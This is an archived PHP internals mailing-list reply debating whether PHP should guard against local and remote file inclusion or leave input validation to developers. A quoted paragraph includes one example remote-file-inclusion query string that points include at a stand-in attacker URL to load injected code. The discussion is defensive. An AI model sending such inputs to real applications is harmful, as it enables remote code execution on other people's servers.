Newsgroups: php.internals
Path: news.php.net
Xref: news.php.net php.internals:59744
Return-Path: <chrisstocktonaz@gmail.com>
Mailing-List: contact internals-help@lists.php.net; run by ezmlm
Delivered-To: mailing list internals@lists.php.net
Received: (qmail 87414 invoked from network); 11 Apr 2012 18:08:27 -0000
Received: from unknown (HELO lists.php.net) (127.0.0.1)
  by localhost with SMTP; 11 Apr 2012 18:08:27 -0000
Authentication-Results: pb1.pair.com smtp.mail=chrisstocktonaz@gmail.com; spf=pass; sender-id=pass
Authentication-Results: pb1.pair.com header.from=chrisstocktonaz@gmail.com; sender-id=pass
Received-SPF: pass (pb1.pair.com: domain gmail.com designates 209.85.210.170 as permitted sender)
X-PHP-List-Original-Sender: chrisstocktonaz@gmail.com
X-Host-Fingerprint: 209.85.210.170 mail-iy0-f170.google.com  
Received: from [209.85.210.170] ([209.85.210.170:35769] helo=mail-iy0-f170.google.com)
	by pb1.pair.com (ecelerity 2.1.1.9-wez r(12769M)) with ESMTP
	id 36/D8-36454-A98C58F4 for <internals@lists.php.net>; Wed, 11 Apr 2012 14:08:26 -0400
Received: by iaeh11 with SMTP id h11so1882722iae.29
        for <internals@lists.php.net>; Wed, 11 Apr 2012 11:08:23 -0700 (PDT)
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;
        d=gmail.com; s=20120113;
        h=mime-version:in-reply-to:references:date:message-id:subject:from:to
         :cc:content-type:content-transfer-encoding;
        bh=rtmudZyvuXHEDMgcG0+yVeQTfpDnb2xzligVBAbU37E=;
        b=dBBGGlCtlhcj7t7TU3W4ZijHJQjYDuum4X+orBcKZRuPardByfnfefAP89n5PXfsG5
         JfXyY1qmc+8f5gevzJXRKuTrgq0/FtcKg8h2k0T5WP7m4njhiLuHAklf9/it3Ep221bQ
         PqzbVhS/K0iq8h39jojgLsN36g4MN8lcvVTS4mTAGHJgLO6o2Uw2Lrh4ckQJY9yx0kHy
         UF5KgKaXAVHH/HIqAcvKZO6HhnSVZ11Je6oM32JvhXOXXf8l83YU8Na/AS0rgp3r7j7g
         ni1dt3CqYALd5gcF/MgQBMjA32wpHp4FaHiwV5iifDsGWZjZocqt7/Gf+WBrUoQ4ePbh
         tUrg==
MIME-Version: 1.0
Received: by 10.50.160.225 with SMTP id xn1mr6609471igb.3.1334167703674; Wed,
 11 Apr 2012 11:08:23 -0700 (PDT)
Received: by 10.42.174.9 with HTTP; Wed, 11 Apr 2012 11:08:23 -0700 (PDT)
In-Reply-To: <CAKOpQSz1=AFfWcO=F0Ot_2Jm8audczE2a1DnGV-vxhp=80ZcUQ@mail.gmail.com>
References: <CAGa2bXZ6G=Cphjrde3u1Mq3AAw-4yJk3s28vNe+Aybt2nGTumg@mail.gmail.com>
	<CAGa2bXZh4uMeUH_BSCFmfNgxS-SZC0svA9BPcSROjwmbfrtFyQ@mail.gmail.com>
	<CAGa2bXbhi4zdgd9Udo6KsoycDwg_Ke0Xe5h3_-fVDMvn_VfAjQ@mail.gmail.com>
	<A633CF2D7C7BED41B41F1E64F25507B806A5CDD6C2@MAILR001.mail.lan>
	<CAGa2bXZKfQ+HqOucwOnBH7gV84hpdxZb5qNY3t3ThF_zMKSGHw@mail.gmail.com>
	<4F850D06.10701@sugarcrm.com>
	<CAGa2bXZWrRh8RdMtKK_2_U_XmByC-O6hGRPrJyW5KwvE0CAK-w@mail.gmail.com>
	<4F8515AF.8060706@sugarcrm.com>
	<CAGa2bXZWudQeRm5h2eENGmgQDPfOqEmijB9-vPAvfKXLCfDiLw@mail.gmail.com>
	<4F851FE4.7000706@sugarcrm.com>
	<CAGa2bXbXdNcfHX_dM2EVVz_2JtS4cc+8pxneSLAd382TuQUg-w@mail.gmail.com>
	<4F8539E0.1090701@sugarcrm.com>
	<4F859063.1010401@lerdorf.com>
	<A633CF2D7C7BED41B41F1E64F25507B806A5CDD71A@MAILR001.mail.lan>
	<CAKOpQSz1=AFfWcO=F0Ot_2Jm8audczE2a1DnGV-vxhp=80ZcUQ@mail.gmail.com>
Date: Wed, 11 Apr 2012 11:08:23 -0700
Message-ID: <CALKFbxs5irYW1Sdus4b=XBvbKqfsMkJbEd14RmXC7tFv7rg-fw@mail.gmail.com>
To: Kris Craig <kris.craig@gmail.com>
Cc: John Crenshaw <johncrenshaw@priacta.com>, Rasmus Lerdorf <rasmus@lerdorf.com>, 
	Stas Malyshev <smalyshev@sugarcrm.com>, Yasuo Ohgaki <yohgaki@ohgaki.net>, 
	"internals@lists.php.net" <internals@lists.php.net>
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Subject: Re: [PHP-DEV] Re: Disabling PHP tags by php.ini and CLI options
From: chrisstocktonaz@gmail.com (Chris Stockton)

Hello,

On Wed, Apr 11, 2012 at 10:53 AM, Kris Craig <kris.craig@gmail.com> wrote:
> I can't help but question whether we should even be worrying about LFI/RF=
I
> to begin with. =A0Personally, I would *never* check-off on code that in a=
ny
> way used $_GET or $_POST directly in an include/require statement! =A0It'=
s
> just plain lazy. =A0There's just no excuse for doing that. =A0Use some so=
rt of
> dispatch or translation table. =A0Sure, it might seem less "magical," but
> it'll also protect you from some asshole hitting you with something like,
> "?file=3Dhttp://hacksite.com/injectedcode.php?". =A0The individual code
> developer has to take *some* responsibility for their code. =A0If this is
> such a problem, I would think the solution would be to update our docs to
> better warn people about this type of attack and educate them on how not =
to
> write code that's vulnerable to it.
>
> We can make the language secure; but, in the end, a language is only as
> smart as the person using it.
>


I really have a hard time understanding how this is even being
discussed, there is no real problem here. Making sure user input is
validated is a core concept of application development. How on earth
can you say "if you don't validate the users input, it's a security
problem, so php must fix it", it's the most ridiculousness argument I
have read on here in ages.

_IF_ you absolutely must accept arbitrary user urls from users, which
we all have to do at some point, you use socket functions, file
functions, HTTP extension, whatever you want. If you are using INCLUDE
you are using the WRONG TOOL. You are WRONG.

_IF_ you are needing to display downloaded user data onto a page, a
image for example, you need to use file functions, fpassthru,
something of the source. If you are using INCLUDE to do this, you are
using the WRONG TOOL. You are WRONG.

_IF_ you for some reason must accept LOCAL PATHS from a user, and you
do not want to pass that input through a validation layer, you are
WRONG.

It boils down to you either use the right tools and the right
validation methods or I promise this is only one of unlimited possible
security concerns Yasuo.

-Chris